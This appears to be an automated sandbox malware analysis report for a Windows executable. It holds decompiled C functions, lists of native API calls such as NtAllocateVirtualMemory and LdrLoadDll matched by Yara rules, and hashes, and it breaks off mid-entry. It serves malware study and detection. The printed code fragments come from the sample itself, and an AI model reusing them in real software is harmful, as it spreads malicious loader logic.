                                                                                                            Function 736110E0, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E736110E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x7361405c = _a8;
				 *0x73614060 = _a16;
				 *0x73614064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73614038, E73611556, _t52);
				_t43 =  *0x7361405c +  *0x7361405c * 4 << 2;
				_t17 = E7361123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E73611266(E736112AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E736112D1( *_t55 - 0x30, E7361123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x73614030;
								 *0x73614030 = _t31;
								E73611508(_t31 + 4,  *0x73614064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x73614030;
							if( *0x73614030 != 0) {
								E73611508( *0x73614064, _t34 + 4, _t43);
								_t37 =  *0x73614030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x73614030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                                            0x736110e7
                                                                                                            0x736110ef
                                                                                                            0x73611103
                                                                                                            0x7361110b
                                                                                                            0x73611116
                                                                                                            0x73611119
                                                                                                            0x73611121
                                                                                                            0x73611124
                                                                                                            0x73611126
                                                                                                            0x736111c4
                                                                                                            0x736111d0
                                                                                                            0x7361112c
                                                                                                            0x7361112d
                                                                                                            0x7361112d
                                                                                                            0x73611130
                                                                                                            0x73611131
                                                                                                            0x73611134
                                                                                                            0x73611203
                                                                                                            0x73611206
                                                                                                            0x7361119e
                                                                                                            0x736111a4
                                                                                                            0x736111ac
                                                                                                            0x736111b1
                                                                                                            0x736111b4
                                                                                                            0x00000000
                                                                                                            0x736111b4
                                                                                                            0x73611209
                                                                                                            0x7361120a
                                                                                                            0x73611186
                                                                                                            0x7361118c
                                                                                                            0x73611194
                                                                                                            0x00000000
                                                                                                            0x73611194
                                                                                                            0x73611152
                                                                                                            0x73611153
                                                                                                            0x7361115b
                                                                                                            0x73611168
                                                                                                            0x73611170
                                                                                                            0x73611179
                                                                                                            0x7361117e
                                                                                                            0x7361117e
                                                                                                            0x00000000
                                                                                                            0x73611153
                                                                                                            0x7361113a
                                                                                                            0x736111d1
                                                                                                            0x736111d1
                                                                                                            0x736111d8
                                                                                                            0x736111e5
                                                                                                            0x736111ea
                                                                                                            0x736111ef
                                                                                                            0x736111f5
                                                                                                            0x736111fb
                                                                                                            0x736111fb
                                                                                                            0x00000000
                                                                                                            0x736111d8
                                                                                                            0x73611140
                                                                                                            0x73611143
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611149
                                                                                                            0x7361114c
                                                                                                            0x7361119b
                                                                                                            0x00000000
                                                                                                            0x7361119b
                                                                                                            0x7361114f
                                                                                                            0x73611150
                                                                                                            0x73611183
                                                                                                            0x00000000
                                                                                                            0x73611183
                                                                                                            0x00000000
                                                                                                            0x736111ba
                                                                                                            0x736111ba
                                                                                                            0x00000000
                                                                                                            0x736111c3

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.344646038.0000000073611000.00000020.00020000.sdmp, Offset: 73610000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.344639568.0000000073610000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344652091.0000000073613000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344660536.0000000073615000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: 748c5d2ab8e1b4c54bb96a11c5094f9a2bac23819285770971f3fdbaff757c24
                                                                                                            • Instruction ID: 2fafc44c9c79aa98d3e316cdad6089aefc4b526ea9d5a9f5f5807a3c1e90350c
                                                                                                            • Opcode Fuzzy Hash: 748c5d2ab8e1b4c54bb96a11c5094f9a2bac23819285770971f3fdbaff757c24
                                                                                                            • Instruction Fuzzy Hash: 5631D7F35042569FE742DF66DA4DF25BFF9EB05242B284116E84AC72D8E630C460CB18
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004057B2(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                            0x004057be
                                                                                                            0x004057c0
                                                                                                            0x004057e8
                                                                                                            0x004057cd
                                                                                                            0x004057d2
                                                                                                            0x004057dd
                                                                                                            0x00000000
                                                                                                            0x004057fa
                                                                                                            0x004057e6
                                                                                                            0x004057e6
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D2
                                                                                                            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                            • Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
                                                                                                            • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                            • Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Analysis Process: 5t2CmTUhKc.exe PID: 6432 Parent PID: 6368 5t2CmTUhKc.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 0041827A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID: !:A$b=A$b=A
                                                                                                            • API String ID: 2738559852-704622139
                                                                                                            • Opcode ID: bda75b2bb32c1a71e4897bbae7e9420c47a96c989b8645594af979ed0517f1bc
                                                                                                            • Instruction ID: 0e954488afad77a3cd6483d6c9f2cc5304775cc5763836557ad725b5a7750ece
                                                                                                            • Opcode Fuzzy Hash: bda75b2bb32c1a71e4897bbae7e9420c47a96c989b8645594af979ed0517f1bc
                                                                                                            • Instruction Fuzzy Hash: C6F0E7B6600108ABCB14DF99DC81EEB77A9EF9C354F118258FA1DA7241DA30E811CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                                                                            0x00418283
                                                                                                            0x0041828f
                                                                                                            0x00418297
                                                                                                            0x0041829c
                                                                                                            0x004182a2
                                                                                                            0x004182bd
                                                                                                            0x004182c5
                                                                                                            0x004182c9

                                                                                                            APIs
                                                                                                            • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID: !:A$b=A$b=A
                                                                                                            • API String ID: 2738559852-704622139
                                                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                            • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                            • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Load
                                                                                                            • String ID:
                                                                                                            • API String ID: 2234796835-0
                                                                                                            • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                            • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                                                            • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                            • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                            • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                            • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004181CE, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: c0b71c95aee51191c1fe91e0108249c8517723fa1d888ca7754ba538bce26533
                                                                                                            • Instruction ID: fd5f7433f2a34c93221db380210f24dbc3382fffcce8468c86bd18cbacf7aea4
                                                                                                            • Opcode Fuzzy Hash: c0b71c95aee51191c1fe91e0108249c8517723fa1d888ca7754ba538bce26533
                                                                                                            • Instruction Fuzzy Hash: 9AF0C4B2200108AFCB08CF88DD84EEB37A9AF8C354F15824CFA0D97240D630E851CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004183AB, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2167126740-0
                                                                                                            • Opcode ID: c36d259eba02ca8ef7349eba16b64d68b7431a5e2108da57c4f6db2edc8418dd
                                                                                                            • Instruction ID: 3679ede50116ae23d234e94d74696cb06d5389d83a42e90e6644c665e332e4af
                                                                                                            • Opcode Fuzzy Hash: c36d259eba02ca8ef7349eba16b64d68b7431a5e2108da57c4f6db2edc8418dd
                                                                                                            • Instruction Fuzzy Hash: 16F0F8B2204218AFCB14DF89DC91EEB77A9AF88754F15815DFE0897281C670E811CBE4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2167126740-0
                                                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                            • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                            • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID:
                                                                                                            • API String ID: 3535843008-0
                                                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                            • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                            • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B198F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 063c528f82b1d001d0cb6d01bdc4c0f72764b0d2ff84c3e308f1a1df356ac1a8
                                                                                                            • Instruction ID: d64984979b305ccb5e35b35acd27a0667bc32fad1515e89ea6ca52b66f6c8e22
                                                                                                            • Opcode Fuzzy Hash: 063c528f82b1d001d0cb6d01bdc4c0f72764b0d2ff84c3e308f1a1df356ac1a8
                                                                                                            • Instruction Fuzzy Hash: FC90026260101502D20171595404616004AD7D0391FA1C076A5054555ECA6589A3F171
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 4489c2ca7f14808274956fbbc9963faa1670cd6d7d3470695136c8ab4354a0ad
                                                                                                            • Instruction ID: fc8cc9ee8be9c98fb4dd9e738ee057c4202b2c6b9eced3574650befb9a06e9f7
                                                                                                            • Opcode Fuzzy Hash: 4489c2ca7f14808274956fbbc9963faa1670cd6d7d3470695136c8ab4354a0ad
                                                                                                            • Instruction Fuzzy Hash: 6190027220101413D211615955047070049D7D0391FA1C466A4454558D96968963F161
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: a87bd7f3a249d6cfde7da98910aacc96d232c7ddbad664543b5fbc6e06de1c4f
                                                                                                            • Instruction ID: 95f6909961eea0f216a17a31d6ae4d59bea172290c0c8aafaae842ca9f112f4a
                                                                                                            • Opcode Fuzzy Hash: a87bd7f3a249d6cfde7da98910aacc96d232c7ddbad664543b5fbc6e06de1c4f
                                                                                                            • Instruction Fuzzy Hash: AC900262242051525645B15954045074046E7E03917A1C066A5444950C85669867E661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 89531899f8a4ac8a9ece141cc46f2db1eb4985ad4b455c023ff5d29ab6bed80f
                                                                                                            • Instruction ID: 71b7c938c8e762d9706efb7f0032ee7508be3a1204aea600cfc989511619690f
                                                                                                            • Opcode Fuzzy Hash: 89531899f8a4ac8a9ece141cc46f2db1eb4985ad4b455c023ff5d29ab6bed80f
                                                                                                            • Instruction Fuzzy Hash: 2E9002A234101442D20061595414B060045D7E1351F61C069E5094554D8659CC63B166
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 14799cad8b0f07284370b739a907d95a04f0e011f1aab40300d877f79d1bb079
                                                                                                            • Instruction ID: 1a481d107f49ac290c7faa8630299d9132cfc41bee699d5ec2a46ee19c353434
                                                                                                            • Opcode Fuzzy Hash: 14799cad8b0f07284370b739a907d95a04f0e011f1aab40300d877f79d1bb079
                                                                                                            • Instruction Fuzzy Hash: 879002A220201003420571595414616404AD7E0351B61C075E5044590DC56588A2B165
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: fa58dfa02bf966abbb3b3759d09f71554276a3d158b91a5e49dd339763a3e8af
                                                                                                            • Instruction ID: 0bd72bcddb3dff370e960f814bb3b6dd2ede98572626d47e6cc89be2df15eed3
                                                                                                            • Opcode Fuzzy Hash: fa58dfa02bf966abbb3b3759d09f71554276a3d158b91a5e49dd339763a3e8af
                                                                                                            • Instruction Fuzzy Hash: DE9002B220101402D240715954047460045D7D0351F61C065A9094554E86998DE6B6A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 3e80138d8b5ece78482768db8b5e55c350639e996ac3796d57c51564e5715ceb
                                                                                                            • Instruction ID: c971a314c98f143b00dd96568ed88d3344b1584f747b0b17e502198f438016a4
                                                                                                            • Opcode Fuzzy Hash: 3e80138d8b5ece78482768db8b5e55c350639e996ac3796d57c51564e5715ceb
                                                                                                            • Instruction Fuzzy Hash: 9E900266211010030205A55917045070086D7D53A1361C075F5045550CD6618872A161
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 4a4d7d0a2e80a333107573396a1033c49ced439b8cc9b6aa5c91f9ad5764e643
                                                                                                            • Instruction ID: cb6cbbc6d1471cc5f359a6ad98460fe7128d69dfddb69a2659d68c357978ac6a
                                                                                                            • Opcode Fuzzy Hash: 4a4d7d0a2e80a333107573396a1033c49ced439b8cc9b6aa5c91f9ad5764e643
                                                                                                            • Instruction Fuzzy Hash: F190027220109802D2106159940474A0045D7D0351F65C465A8454658D86D588A2B161
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 9e83950b46826a34b4ca013e3159298a87cd56ab1115622e9cdc6fd77e368c02
                                                                                                            • Instruction ID: bf6746e31020169648be33c61ae90c02cacae2c90904c8f6487dd40e4f67ee1c
                                                                                                            • Opcode Fuzzy Hash: 9e83950b46826a34b4ca013e3159298a87cd56ab1115622e9cdc6fd77e368c02
                                                                                                            • Instruction Fuzzy Hash: 35900262601010424240716998449064045FBE1361761C175A49C8550D85998876A6A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 3d03f7c547199f99c02c7dee017407456afe7b34bec77374484adaf8b2866613
                                                                                                            • Instruction ID: 7f15fa59ff672cabf126af0337b88c62a59e9ca56a2d1198431690febca14208
                                                                                                            • Opcode Fuzzy Hash: 3d03f7c547199f99c02c7dee017407456afe7b34bec77374484adaf8b2866613
                                                                                                            • Instruction Fuzzy Hash: 3B90027220141402D2006159581470B0045D7D0352F61C065A5194555D86658862B5B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 96d8a5747d9d81362ba1cdf758f5da86a6fd4160afb6ff4e805053ee72cd80ef
